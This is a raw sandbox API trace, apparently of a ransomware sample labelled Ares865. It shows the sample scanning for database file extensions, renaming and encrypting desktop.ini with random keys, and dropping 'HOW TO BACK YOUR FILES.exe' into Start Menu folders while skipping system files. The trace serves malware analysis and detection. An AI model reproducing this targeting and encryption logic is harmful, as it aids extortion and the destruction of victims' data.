[0058.015] lstrlenW (lpString="epim") returned 4 [0058.015] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.015] lstrlenW (lpString="fcd") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.015] lstrlenW (lpString="fdb") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.015] lstrlenW (lpString="fic") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.015] lstrlenW (lpString="flexolibrary") returned 12 [0058.015] lstrlenW (lpString="fm5") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.015] lstrlenW (lpString="fmp") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.015] lstrlenW (lpString="fmp12") returned 5 [0058.015] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.015] lstrlenW (lpString="fmpsl") returned 5 [0058.015] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.015] lstrlenW (lpString="fol") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.015] lstrlenW (lpString="fp3") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.016] lstrlenW (lpString="fp4") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.016] lstrlenW (lpString="fp5") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.016] lstrlenW (lpString="fp7") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.016] lstrlenW (lpString="fpt") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.016] lstrlenW (lpString="frm") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.016] lstrlenW (lpString="gdb") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.016] lstrlenW (lpString="gdb") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.016] lstrlenW (lpString="grdb") returned 4 [0058.016] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.016] lstrlenW (lpString="gwi") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.016] lstrlenW (lpString="hdb") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.016] lstrlenW (lpString="his") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.016] lstrlenW (lpString="ib") returned 2 [0058.016] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.016] lstrlenW (lpString="idb") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.016] lstrlenW (lpString="ihx") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.016] lstrlenW (lpString="itdb") returned 4 [0058.016] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.016] lstrlenW (lpString="itw") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.016] lstrlenW (lpString="jet") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.016] lstrlenW (lpString="jtx") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.016] lstrlenW (lpString="kdb") returned 3 [0058.016] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.017] lstrlenW (lpString="kexi") returned 4 [0058.017] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.017] lstrlenW (lpString="kexic") returned 5 [0058.017] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.017] lstrlenW (lpString="kexis") returned 5 [0058.017] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.017] lstrlenW (lpString="lgc") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.017] lstrlenW (lpString="lwx") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.017] lstrlenW (lpString="maf") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.017] lstrlenW (lpString="maq") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.017] lstrlenW (lpString="mar") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.017] lstrlenW (lpString="marshal") returned 7 [0058.017] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.017] lstrlenW (lpString="mas") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.017] lstrlenW (lpString="mav") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.017] lstrlenW (lpString="maw") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.017] lstrlenW (lpString="mdbhtml") returned 7 [0058.017] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.017] lstrlenW (lpString="mdn") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.017] lstrlenW (lpString="mdt") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.017] lstrlenW (lpString="mfd") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.017] lstrlenW (lpString="mpd") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.017] lstrlenW (lpString="mrg") returned 3 [0058.017] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.017] lstrlenW (lpString="mud") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.018] lstrlenW (lpString="mwb") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.018] lstrlenW (lpString="myd") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.018] lstrlenW (lpString="ndf") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.018] lstrlenW (lpString="nnt") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.018] lstrlenW (lpString="nrmlib") returned 6 [0058.018] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.018] lstrlenW (lpString="ns2") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.018] lstrlenW (lpString="ns3") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.018] lstrlenW (lpString="ns4") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.018] lstrlenW (lpString="nsf") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.018] lstrlenW (lpString="nv") returned 2 [0058.018] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.018] lstrlenW (lpString="nv2") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.018] lstrlenW (lpString="nwdb") returned 4 [0058.018] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.018] lstrlenW (lpString="nyf") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.018] lstrlenW (lpString="odb") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.018] lstrlenW (lpString="odb") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.018] lstrlenW (lpString="oqy") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.018] lstrlenW (lpString="ora") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.018] lstrlenW (lpString="orx") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.018] lstrlenW (lpString="owc") returned 3 [0058.018] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.019] lstrlenW (lpString="p96") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.019] lstrlenW (lpString="p97") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.019] lstrlenW (lpString="pan") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.019] lstrlenW (lpString="pdb") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.019] lstrlenW (lpString="pdm") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.019] lstrlenW (lpString="pnz") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.019] lstrlenW (lpString="qry") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.019] lstrlenW (lpString="qvd") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.019] lstrlenW (lpString="rbf") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.019] lstrlenW (lpString="rctd") returned 4 [0058.019] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.019] lstrlenW (lpString="rod") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.019] lstrlenW (lpString="rodx") returned 4 [0058.019] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.019] lstrlenW (lpString="rpd") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.019] lstrlenW (lpString="rsd") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.019] lstrlenW (lpString="sas7bdat") returned 8 [0058.019] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.019] lstrlenW (lpString="sbf") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.019] lstrlenW (lpString="scx") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.019] lstrlenW (lpString="sdb") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.019] lstrlenW (lpString="sdc") returned 3 [0058.019] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.020] lstrlenW (lpString="sdf") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.020] lstrlenW (lpString="sis") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.020] lstrlenW (lpString="spq") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.020] lstrlenW (lpString="te") returned 2 [0058.020] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.020] lstrlenW (lpString="teacher") returned 7 [0058.020] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.020] lstrlenW (lpString="tmd") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.020] lstrlenW (lpString="tps") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.020] lstrlenW (lpString="trc") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.020] lstrlenW (lpString="trc") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.020] lstrlenW (lpString="trm") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.020] lstrlenW (lpString="udb") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.020] lstrlenW (lpString="udl") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.020] lstrlenW (lpString="usr") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.020] lstrlenW (lpString="v12") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.020] lstrlenW (lpString="vis") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.020] lstrlenW (lpString="vpd") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.020] lstrlenW (lpString="vvv") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.020] lstrlenW (lpString="wdb") returned 3 [0058.020] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.020] lstrlenW (lpString="wmdb") returned 4 [0058.020] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.021] lstrlenW (lpString="wrk") returned 3 [0058.021] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.021] lstrlenW (lpString="xdb") returned 3 [0058.021] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.021] lstrlenW (lpString="xld") returned 3 [0058.021] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.021] lstrlenW (lpString="xmlff") returned 5 [0058.021] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.021] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\desktop.ini.Ares865") returned 52 [0058.021] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\desktop.ini" (normalized: "c:\\users\\default user\\start menu\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.023] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.023] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0058.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0058.023] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0058.024] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.024] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.024] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x154 [0058.026] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0058.027] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0058.028] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.028] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.028] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.028] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.028] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.028] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.028] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.028] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.028] CloseHandle (hObject=0x154) returned 1 [0058.028] CloseHandle (hObject=0x15c) returned 1 [0058.029] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.030] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49cb3ac0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49cb3ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.030] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.030] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cd9c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cd9c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="aoldtz.exe") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2=".") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="..") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="windows") returned -1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="bootmgr") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="temp") returned -1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="pagefile.sys") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="boot") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="ids.txt") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="ntuser.dat") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="perflogs") returned 1 [0058.030] lstrcmpiW (lpString1="Programs", lpString2="MSBuild") returned 1 [0058.030] lstrlenW (lpString="Programs") returned 8 [0058.030] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\desktop.ini") returned 44 [0058.030] lstrcpyW (in: lpString1=0x2cce442, lpString2="Programs" | out: lpString1="Programs") returned="Programs" [0058.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0058.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df710 [0058.030] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0058.030] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cd9c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cd9c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0 [0058.030] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.030] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0058.030] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu\\Programs", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs") returned="C:\\Users\\Default User\\Start Menu\\Programs" [0058.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0058.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.031] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs") returned 41 [0058.031] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs") returned="C:\\Users\\Default User\\Start Menu\\Programs" [0058.031] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.031] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.031] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.031] GetLastError () returned 0x0 [0058.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.031] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.033] CloseHandle (hObject=0x118) returned 1 [0058.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.033] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.033] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cd9c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cd9c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.033] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.033] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.033] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.033] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cd9c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cd9c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.033] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.033] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.033] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.033] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.034] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d721a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d721a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="aoldtz.exe") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2=".") returned 1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="..") returned 1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="windows") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="bootmgr") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="temp") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="pagefile.sys") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="boot") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="ids.txt") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="ntuser.dat") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="perflogs") returned -1 [0058.034] lstrcmpiW (lpString1="Accessories", lpString2="MSBuild") returned -1 [0058.034] lstrlenW (lpString="Accessories") returned 11 [0058.034] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\*") returned 43 [0058.034] lstrcpyW (in: lpString1=0x2cce454, lpString2="Accessories" | out: lpString1="Accessories") returned="Accessories" [0058.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0058.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d2f68 [0058.034] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0058.034] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d4c040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d4c040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="aoldtz.exe") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2=".") returned 1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", 